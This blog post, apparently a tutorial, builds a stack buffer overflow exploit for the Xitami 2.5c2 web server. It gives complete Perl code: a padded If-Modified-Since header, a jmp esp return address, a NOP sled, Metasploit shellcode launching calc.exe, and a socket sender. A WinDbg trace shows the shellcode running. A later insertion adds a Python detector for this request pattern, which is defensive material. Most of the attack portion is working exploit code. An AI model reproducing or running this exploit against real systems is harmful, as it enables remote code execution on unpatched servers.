How to pack your Sandwich about PoC? 
Tags: Security Technology | Views (341) | Comments (0) | 02-28 23:58

writer: demonalex[at]dark2s[dot]org


Prerequisite knowledge:
* How do you determine how much content fits in the useless buffer (the padding length)?
* Which RETURN ADDRESS is usable?
* How do you get EIP to the shellcode?
If you can handle the three questions above, I think your PoC will be honey for a hax0r...

In fact, the structure of a PoC looks like a sandwich (look at my title, so... so... hey!). Which god gave me this idea??? Mystery...

1) First, we must choose a development language to pack the PoC in. I like Perl...
2) Second, we must find out how much content fits in the useless buffer (how many bytes of padding are needed).
3) Third, of course, our RETURN ADDRESS must be the address of a 'jmp esp' instruction... The address differs between OS versions...
PS: Some addresses are quite universal, for example 0x7ffa4512.
4) Finally, the 'jump code' after the return address forces EIP to jump into the shellcode on the stack.

In this section I give an example PoC for Xitami (version 2.5c2), in Perl:
01:###############################################
02:#PoC:
03:$head="GET / HTTP/1.1\r\n".
04:      "Host: $target_ip\r\n".
05:      "If-Modified-Since: Evil, ";
06:$buffer="\x41"x72;
07:$ret="\x12\x45\xfa\x7f";
08:$jmpcode="\xeb\x30";
09:$n0p="\x90"x55;
10:# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
11:$shellcode =
12:"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9b".
13:"\x41\xde\xdc\x83\xeb\xfc\xe2\xf4\x67\xa9\x9a\xdc\x9b\x41\x55\x99".
14:"\xa7\xca\xa2\xd9\xe3\x40\x31\x57\xd4\x59\x55\x83\xbb\x40\x35\x95".
15:"\x10\x75\x55\xdd\x75\x70\x1e\x45\x37\xc5\x1e\xa8\x9c\x80\x14\xd1".
16:"\x9a\x83\x35\x28\xa0\x15\xfa\xd8\xee\xa4\x55\x83\xbf\x40\x35\xba".
17:"\x10\x4d\x95\x57\xc4\x5d\xdf\x37\x10\x5d\x55\xdd\x70\xc8\x82\xf8".
18:"\x9f\x82\xef\x1c\xff\xca\x9e\xec\x1e\x81\xa6\xd0\x10\x01\xd2\x57".
19:"\xeb\x5d\x73\x57\xf3\x49\x35\xd5\x10\xc1\x6e\xdc\x9b\x41\x55\xb4".
20:"\xa7\x1e\xef\x2a\xfb\x17\x57\x24\x18\x81\xa5\x8c\xf3\xb1\x54\xd8".
21:"\xc4\x29\x46\x22\x11\x4f\x89\x23\x7c\x22\xbf\xb0\xf8\x6f\xbb\xa4".
22:"\xfe\x41\xde\xdc";
23:#
24:$ending="\r\n\r\n";
25:
26:$expcode="$head"."$buffer"."$ret"."$jmpcode"."$n0p"."$shellcode"."$ending";
27:###############################################
Let us talk about the structure of the variable '$expcode'.
HTTP header format: lines 03-05, line 24;
If-Modified-Since content: lines 06-09, lines 11-22.

Sandwich structure:
|------'A'x72------|--"\x12\x45\xfa\x7f"--|-----"\xeb\x30"-----|--"\x90"x55--|-"$shellcode"--|
|< useless buffer >|<   jmp esp address  >|<jmp short 00000032>|<  55 nops  >|<  shellcode  >|

A. The useless buffer is 72 bytes;
B. The jmp esp address is 0x7ffa4512;
C. After ret (jmp esp) comes the jmpcode:
[perl code:] "\xeb\x30"     < - >     [asm:] jmp short 00000032
(hex)32 == (int)50
So $jmpcode means a short jump over 50 bytes.
D. After the jmpcode come 55 NOPs. The jmpcode runs because the RETURN ADDRESS is jmp esp, and the jmpcode then steps across 50 NOPs, so execution lands 5 NOPs before the shellcode.
E. The $shellcode from Metasploit starts calc.exe after those 5 NOPs.
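As an added example from the defender's side (not code from the original post), here is a small Python check that recognises the sandwich layout described above inside an HTTP request: If-Modified-Since is supposed to carry only an RFC 1123 date, so a value that is not a date and contains a long filler run, the little-endian bytes of the 0x7ffa4512 return address, a short jmp (0xeb) right behind it, or a NOP sled is flagged. MAX_DATE_LEN, the 16-byte sled threshold and the two sample requests are assumptions and constructed inputs.

```python
import re
from email.utils import parsedate_to_datetime

# Little-endian form of the "jmp esp" address 0x7ffa4512 quoted in the post.
JMP_ESP_7FFA4512 = b"\x12\x45\xfa\x7f"
MAX_DATE_LEN = 64   # assumption: a real HTTP-date is ~29 bytes, so 64 is generous

def header_value(request: bytes, name: bytes) -> bytes:
    """First value of header `name` in a raw HTTP request head, b"" if absent."""
    for line in request.split(b"\r\n\r\n", 1)[0].split(b"\r\n")[1:]:
        field, sep, value = line.partition(b":")
        if sep and field.strip().lower() == name.lower():
            return value.strip()
    return b""

def longest_run(data: bytes) -> tuple[int, int]:
    """(length, byte) of the longest run of one repeated byte; (0, -1) if empty."""
    best = (0, -1)
    for m in re.finditer(rb"(.)\1*", data, re.DOTALL):
        if len(m.group(0)) > best[0]:
            best = (len(m.group(0)), m.group(1)[0])
    return best

def is_http_date(value: bytes) -> bool:
    try:  # raises ValueError (3.10+) or returns None (older) on garbage
        return parsedate_to_datetime(value.decode("latin-1")) is not None
    except (ValueError, TypeError):
        return False

def inspect_if_modified_since(request: bytes) -> dict:
    """Score the If-Modified-Since value for the filler/ret/jmp/NOP-sled layout."""
    value = header_value(request, b"If-Modified-Since")
    ret_at = value.find(JMP_ESP_7FFA4512)           # -1 if the known address is absent
    f = {
        "length": len(value),
        "valid_date": is_http_date(value),
        "longest_run": longest_run(value),          # the filler bytes show up here
        "ret_offset": ret_at,
        "jmp_after_ret": ret_at >= 0 and value[ret_at + 4:ret_at + 5] == b"\xeb",
        "nop_sled": re.search(rb"\x90{16,}", value) is not None,  # assumption: 16+ NOPs
    }
    f["suspicious"] = not f["valid_date"] and (
        f["length"] > MAX_DATE_LEN or ret_at >= 0 or f["nop_sled"])
    return f

# Constructed samples: a benign request and one shaped like $expcode above (b"S" * 20 stands in for shellcode).
BENIGN = b"GET / HTTP/1.1\r\nHost: h\r\nIf-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n"
SANDWICH = (b"GET / HTTP/1.1\r\nHost: h\r\nIf-Modified-Since: Evil, " + b"A" * 72
            + JMP_ESP_7FFA4512 + b"\xeb\x30" + b"\x90" * 55 + b"S" * 20 + b"\r\n\r\n")
```

The check is tied to one known address; in practice the "not a valid date, yet long" condition alone already catches this class of request, and the other fields only explain why.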

The rest of the PoC code:
OK, now we open a socket and send it to the target!
#Perl code:
use Socket;
use IO::Handle;
$|=1;
socket(SOCK,AF_INET,SOCK_STREAM,6) || die("cannot create socket!\n");
$address=inet_aton("127.0.0.1");
$target=sockaddr_in(80,$address);
connect(SOCK,$target) || die("cannot connect target!\n");
SOCK->autoflush(1);
send(SOCK,$expcode,0) || die("cannot send data!\n");
close(SOCK);
exit 1;
#Over

DEBUG:
On the local machine, use WinDbg to attach to the 'Xigui32.exe' process, then run the exploit!...
**********************************************
0:003> g
(d54.3e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=77e49e28 ecx=fffffc36 edx=00000000 esi=b66116ff edi=77e48efc
eip=00c9ffa9 esp=00c9ff24 ebp=77e10000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
00c9ffa9 ac               lodsb                                ds:b66116ff=??
0:001> d eip
00c9ffa9  ac 84 c0 74 07 c1 ca 0d-01 c2 eb f4 3b 54 24 04  ...t........;T$.
00c9ffb9  75 e5 8b 5f 24 01 eb 66-8b 0c 4b 8b 5f 1c 01 eb  u.._$..f..K._...
00c9ffc9  8b 1c 8b 01 eb 89 5c 24-04 c3 31 c0 64 8b 40 30  ......\$..1.d.@0
00c9ffd9  85 c0 78 0c 8b 40 0c 8b-70 1c ad 8b 68 08 eb 09  ..x..@..p...h...
00c9ffe9  8b 80 b0 00 00 00 8b 68-3c 5f 31 f6 60 56 89 f8  .......h<_1.`V..
00c9fff9  83 c0 7b 50 68 f0 8a 04-5f 68 98 fe 8a 0e 57 ff  ..{Ph..._h....W.
00ca0009  e7 63 61 6c 63 2e 65 78-65 00 00 00 00 00 00 00  .calc.exe.......
00ca0019  00 10 00 00 20 00 00 00-02 00 00 00 20 00 00 22  .... ....... .."
**********************************************

http://www.i170.com/Article/101111/trackback
